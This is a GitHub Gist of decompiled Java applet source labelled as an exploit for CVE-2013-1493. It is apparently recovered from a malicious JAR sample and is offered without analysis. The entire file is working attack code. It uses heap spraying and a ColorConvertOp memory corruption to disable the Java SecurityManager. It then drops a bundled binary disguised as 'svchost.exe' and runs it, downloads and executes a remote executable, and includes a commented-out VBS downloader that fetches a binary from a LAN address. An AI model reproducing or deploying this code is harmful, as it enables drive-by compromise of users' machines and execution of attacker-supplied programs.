Created
March 18, 2013 13:04
-
-
Save hellok/5187002 to your computer and use it in GitHub Desktop.
CVE-2013-1493 EXP get from some online hex-editor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* */ import java.applet.Applet; | |
/* */ import java.awt.color.ColorSpace; | |
/* */ import java.awt.image.BufferedImage; | |
/* */ import java.awt.image.ColorConvertOp; | |
/* */ import java.awt.image.ColorModel; | |
/* */ import java.awt.image.ComponentColorModel; | |
/* */ import java.awt.image.ComponentSampleModel; | |
/* */ import java.awt.image.DataBuffer; | |
/* */ import java.awt.image.SampleModel; | |
/* */ import java.awt.image.WritableRaster; | |
import java.io.BufferedInputStream; | |
/* */ import java.io.File; | |
/* */ import java.io.FileOutputStream; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.net.HttpURLConnection; | |
import java.net.URL; | |
/* */ | |
/* */ public class ImAlpha extends Applet | |
/* */ { | |
/* */ private static final long serialVersionUID = 1L; | |
/* */ static final int ARRAY_MAGIC = -1341411317; | |
/* */ static final int ARRAY_OLDSIZE = 11; | |
/* */ static final int ARRAY_NEWSIZE = 2147483647; | |
/* */ static final int LEAK_MAGIC = -559035650; | |
/* */ static final int SPRAY_ARRAY_COUNT = 2808685; | |
/* */ static final int SPRAY_LEAK_COUNT = 2000000; | |
/* */ volatile ImAlpha.Leak[] _sleaks; | |
/* */ volatile int[][] _sarrays; | |
/* */ volatile int[] _bigArray; | |
/* */ int[] _memBaseObj; | |
/* */ long _memBaseIdx; | |
/* */ long _memBasePtr; | |
/* */ int[] soffsets; | |
/* */ int[] doffsets; | |
/* */ | |
/* */ public ImAlpha() | |
/* */ { | |
/* 28 */ this.soffsets = new int[] { 0, 1, 2, 3 }; | |
/* */ | |
/* 31 */ this.doffsets = new int[] { 0, 1, 2, 50000000 }; | |
/* */ } | |
/* */ | |
/* */ void spray() | |
/* */ throws Exception | |
/* */ { | |
/* 37 */ Runtime.getRuntime().gc(); | |
/* 38 */ Runtime.getRuntime().gc(); | |
/* */ | |
/* 40 */ this._sleaks = new ImAlpha.Leak[2000000]; | |
/* 41 */ this._sarrays = new int[2808685][]; | |
/* */ try | |
/* */ { | |
/* 44 */ for (int i = 0; i < this._sarrays.length; i++) { | |
/* 45 */ this._sarrays[i] = new int[11]; | |
/* 46 */ for (int j = 0; j < this._sarrays[i].length; j++) { | |
/* 47 */ this._sarrays[i][j] = -1341411317; | |
/* */ } | |
/* */ } | |
/* */ | |
/* 51 */ for (int i = 0; i < this._sleaks.length; i++) | |
/* 52 */ this._sleaks[i] = new ImAlpha.Leak("L"); | |
/* */ } | |
/* */ catch (OutOfMemoryError localOutOfMemoryError) | |
/* */ { | |
/* */ } | |
/* */ } | |
/* */ | |
/* */ void getBigArray() | |
/* */ throws Exception | |
/* */ { | |
/* 62 */ for (int i = 0; i < this._sarrays.length; i++) { | |
/* 63 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) { | |
/* 64 */ this._sarrays[i][j] = -1341411317; | |
/* */ } | |
/* */ } | |
/* */ | |
/* 68 */ for (int i = 0; i < this._sarrays.length; i++) { | |
/* 69 */ if (this._sarrays[i].length != 2147483647) { | |
/* 70 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) { | |
/* 71 */ if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) { | |
/* 72 */ this._sarrays[i][(j - 1)] = 2147483647; | |
/* */ } | |
/* */ } | |
/* */ } | |
/* */ } | |
/* */ | |
/* 78 */ for (int i = 0; i < this._sarrays.length; i++) { | |
/* 79 */ if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647)) | |
/* */ continue; | |
/* 81 */ this._bigArray = this._sarrays[i]; | |
/* */ } | |
/* */ | |
/* 86 */ if (this._bigArray == null) | |
/* 87 */ throw new Exception("fail"); | |
/* */ } | |
/* */ | |
/* */ long getAddress(Object obj) | |
/* */ throws Exception | |
/* */ { | |
/* 93 */ for (int i = 0; i < this._bigArray.length; i++) { | |
/* 94 */ if (this._bigArray[i] == -559035650) { | |
/* 95 */ int flag = 0; | |
/* */ | |
/* 97 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null; | |
/* 98 */ flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0); | |
/* */ | |
/* 100 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X"; | |
/* 101 */ flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0); | |
/* */ | |
/* 103 */ if (flag == 2) { | |
/* 104 */ for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj; | |
/* 105 */ return this._bigArray[(i + 1)]; | |
/* */ } | |
/* */ } | |
/* */ } | |
/* */ | |
/* 110 */ throw new Exception("fail"); | |
/* */ } | |
/* */ | |
/* */ void getMemBase() | |
/* */ throws Exception | |
/* */ { | |
/* 116 */ for (int i = 0; i < this._sarrays.length; i++) { | |
/* 117 */ for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) { | |
/* 118 */ this._sarrays[i][j] = (j == 1 ? i : -1341411317); | |
/* */ } | |
/* */ } | |
/* */ | |
/* 122 */ for (int i = 0; i < this._bigArray.length; i++) { | |
/* 123 */ if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) { | |
/* 124 */ int len = this._bigArray[(i - 1)]; | |
/* 125 */ int idx = this._bigArray[(i + 1)]; | |
/* 126 */ if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) { | |
/* 127 */ this._memBaseObj = this._sarrays[idx]; | |
/* 128 */ this._memBaseIdx = i; | |
/* 129 */ break; | |
/* */ } | |
/* */ } | |
/* */ } | |
/* */ | |
/* 134 */ if (this._memBaseObj == null) { | |
/* 135 */ throw new Exception("fail"); | |
/* */ } | |
/* */ | |
/* 138 */ this._memBasePtr = getAddress(this._memBaseObj); | |
/* */ | |
/* 140 */ if (this._memBasePtr == 0L) { | |
/* 141 */ throw new Exception("fail"); | |
/* */ } | |
/* */ | |
/* 144 */ this._memBasePtr += 12L; | |
/* */ } | |
/* */ | |
/* */ int rdMem(long addr) | |
/* */ { | |
/* 149 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L; | |
/* 150 */ if ((offs >= 0L) && (offs < 2147483647L)) { | |
/* 151 */ return this._bigArray[(int)offs]; | |
/* */ } | |
/* 153 */ return 0; | |
/* */ } | |
/* */ | |
/* */ void wrMem(long addr, int value) | |
/* */ { | |
/* 158 */ long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L; | |
/* 159 */ if ((offs >= 0L) && (offs < 2147483647L)) | |
/* 160 */ this._bigArray[(int)offs] = value; | |
/* */ } | |
/* */ | |
/* */ void privileged() | |
/* */ { | |
/* */ try | |
/* */ { | |
/* 167 */ String Dir = new String(""); | |
/* 168 */ Dir = System.getProperty("java.io.tmpdir"); | |
/* */ | |
/* 170 */ File f1 = new File(Dir + "svchost.exe"); | |
/* */ try | |
/* */ { | |
/* 175 */ boolean b = f1.createNewFile(); | |
/* */ } | |
/* */ catch (Exception e) | |
/* */ { | |
/* */ boolean b; | |
/* 180 */ e.printStackTrace(); | |
/* */ } | |
/* */ | |
/* 183 */ FileOutputStream outstream = new FileOutputStream(Dir + "svchost.exe"); | |
/* */ | |
/* 185 */ InputStream instream = ImAlpha.class.getResourceAsStream("svchost.cfg"); | |
/* */ | |
/* 187 */ int Mnocopploa = 0; | |
/* */ | |
/* 190 */ while ((Mnocopploa = instream.read()) != -1) | |
/* */ { | |
/* 193 */ outstream.write(Mnocopploa); | |
/* */ } | |
/* */ | |
/* 196 */ outstream.flush(); | |
/* 197 */ outstream.close(); | |
/* 198 */ instream.close(); | |
/* */ | |
/* 200 */ Runtime.getRuntime().exec(Dir + "svchost.exe"); | |
/* */ } catch (Exception localException) { | |
/* 202 */ localException.printStackTrace(); | |
/* */ } | |
/* */ } | |
public void privileged2() throws IOException | |
{ | |
Process localProcess = null; | |
// String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " + | |
// "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe"; | |
String command="calc.exe"; | |
localProcess = Runtime.getRuntime().exec(command); | |
} | |
public void privileged1() throws IOException | |
{ | |
Runtime.getRuntime().exec("calc"); | |
URL localURL = new URL("http://www.bestoldgames.net/dosbox/download/DOSBox-0.63-install.exe"); | |
HttpURLConnection localObject3 = (HttpURLConnection)localURL.openConnection(); | |
int i = ((HttpURLConnection)localObject3).getContentLength(); | |
String str2 = ((HttpURLConnection)localObject3).getContentType(); | |
int j = ((HttpURLConnection)localObject3).getResponseCode(); | |
if ((j == 200) && (str2.startsWith("application/")) && (i > 0)) | |
{ | |
InputStream localInputStream = ((HttpURLConnection)localObject3).getInputStream(); | |
BufferedInputStream localBufferedInputStream = new BufferedInputStream(localInputStream); | |
byte[] arrayOfByte2 = new byte[i]; | |
int k = 0; | |
int m = 0; | |
while (m < i) | |
{ | |
k = localBufferedInputStream.read(arrayOfByte2, m, arrayOfByte2.length - m); | |
if (k == -1) | |
break; | |
m += k; | |
} | |
localBufferedInputStream.close(); | |
if (m != i) | |
System.exit(0); | |
File localFile = File.createTempFile("~tmp", ".exe"); | |
FileOutputStream localFileOutputStream = new FileOutputStream(localFile); | |
localFileOutputStream.write(arrayOfByte2); | |
localFileOutputStream.flush(); | |
localFileOutputStream.close(); | |
Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() }); | |
} | |
} | |
/* */ | |
/* */ public void init() | |
/* */ { | |
/* */ try | |
/* */ { | |
/* 212 */ if (System.getSecurityManager() == null) { | |
/* 213 */ privileged1(); | |
/* 214 */ return; | |
/* */ } | |
/* */ | |
/* 217 */ int sWidth = 168; int sHeight = 1; | |
/* 218 */ int spStride = 4; int ssStride = spStride * sWidth; | |
/* */ | |
/* 220 */ int dWidth = sWidth; int dHeight = sHeight; | |
/* 221 */ int dpStride = 1; int dsStride = 0; | |
/* */ | |
/* 223 */ ColorSpace scs = new ImAlpha.MyColorSpace(0, this.soffsets.length - 1); | |
/* 224 */ ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0); | |
/* 225 */ SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets); | |
/* 226 */ BufferedImage sbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm); | |
/* */ | |
/* 228 */ for (int i = 0; i < ssStride; i++) { | |
/* 229 */ sbi.getRaster().getDataBuffer().setElem(i, 1); | |
/* */ } | |
/* */ | |
/* 232 */ ColorSpace dcs = new ImAlpha.MyColorSpace(0, this.doffsets.length - 1); | |
/* 233 */ ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0); | |
/* 234 */ SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets); | |
/* 235 */ BufferedImage dbi = new ImAlpha.MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm); | |
/* */ | |
/* 237 */ ColorConvertOp cco = new ColorConvertOp(null); | |
/* */ | |
/* 239 */ spray(); | |
/* */ try | |
/* */ { | |
/* 242 */ cco.filter(sbi, dbi); | |
/* */ } | |
/* */ catch (Exception localException) { | |
/* */ } | |
/* 246 */ getBigArray(); | |
/* */ | |
/* 248 */ getMemBase(); | |
/* */ | |
/* 250 */ long sys = getAddress(System.class); | |
/* 251 */ long sm = getAddress(System.getSecurityManager()); | |
/* 252 */ sys = rdMem(sys + 4L); | |
/* 253 */ for (int i = 0; i < 2000000; i++) { | |
/* 254 */ long addr = sys + i * 4; | |
/* 255 */ int val = rdMem(addr); | |
/* 256 */ if (val == sm) { | |
/* 257 */ wrMem(addr, 0); | |
/* 258 */ if (System.getSecurityManager() == null) { | |
/* */ break; | |
/* */ } | |
/* */ } | |
/* */ } | |
/* 263 */ privileged1(); | |
/* */ } | |
/* */ catch (Exception localException1) | |
/* */ { | |
/* */ } | |
/* */ } | |
/* */ | |
/* */ public static void main(String[] args) { | |
/* 271 */ new ImAlpha().init(); | |
/* */ } | |
/* */ | |
/* */ class MyColorSpace extends ColorSpace | |
/* */ { | |
/* */ private static final long serialVersionUID = 1L; | |
/* */ | |
/* */ public MyColorSpace(int type, int numcomponents) | |
/* */ { | |
/* 341 */ super(type, numcomponents); } | |
/* 342 */ public float[] fromCIEXYZ(float[] value) { return null; } | |
/* 343 */ public float[] toCIEXYZ(float[] value) { return null; } | |
/* 344 */ public float[] fromRGB(float[] value) { return null; } | |
/* 345 */ public float[] toRGB(float[] value) { return null; | |
/* */ } | |
/* */ } | |
/* */ | |
/* */ class MyBufferedImage extends BufferedImage | |
/* */ { | |
/* */ int _fakeType; | |
/* */ ColorModel _fakeColorModel; | |
/* */ SampleModel _fakeSampleModel; | |
/* */ | |
/* */ public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel) | |
/* */ { | |
/* 297 */ super(width, height, imageType); | |
/* */ | |
/* 299 */ this._fakeType = fakeType; | |
/* 300 */ this._fakeColorModel = fakeColorModel; | |
/* 301 */ this._fakeSampleModel = fakeSampleModel; | |
/* */ } | |
/* */ | |
/* */ public int getType() | |
/* */ { | |
/* 306 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); | |
/* 307 */ if (caller.contains("ICC_Transform.getImageLayout(")) { | |
/* 308 */ return this._fakeType; | |
/* */ } | |
/* */ | |
/* 311 */ return super.getType(); | |
/* */ } | |
/* */ | |
/* */ public ColorModel getColorModel() | |
/* */ { | |
/* 316 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); | |
/* 317 */ if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) { | |
/* 318 */ return this._fakeColorModel; | |
/* */ } | |
/* */ | |
/* 321 */ return super.getColorModel(); | |
/* */ } | |
/* */ | |
/* */ public SampleModel getSampleModel() | |
/* */ { | |
/* 326 */ String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString(); | |
/* 327 */ if (caller.contains("ICC_Transform.getImageLayout(")) { | |
/* 328 */ return this._fakeSampleModel; | |
/* */ } | |
/* */ | |
/* 331 */ return super.getSampleModel(); | |
/* */ } | |
/* */ } | |
/* */ | |
/* */ class Leak | |
/* */ { | |
/* */ public volatile int magic; | |
/* */ public volatile Object obj; | |
/* */ public volatile Object obj2; | |
/* */ public volatile Object obj3; | |
/* */ public volatile Object obj4; | |
/* */ | |
/* */ public Leak(Object o) | |
/* */ { | |
/* 284 */ this.magic = -559035650; | |
/* 285 */ this.obj = o; | |
/* */ } | |
/* */ } | |
/* */ } | |
/* Location: E:\360浜戠洏\POC_linux_also\sample\CVE-2013-1493_sample\OK.jar | |
* Qualified Name: ImAlpha | |
* JD-Core Version: 0.6.0 | |
*/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment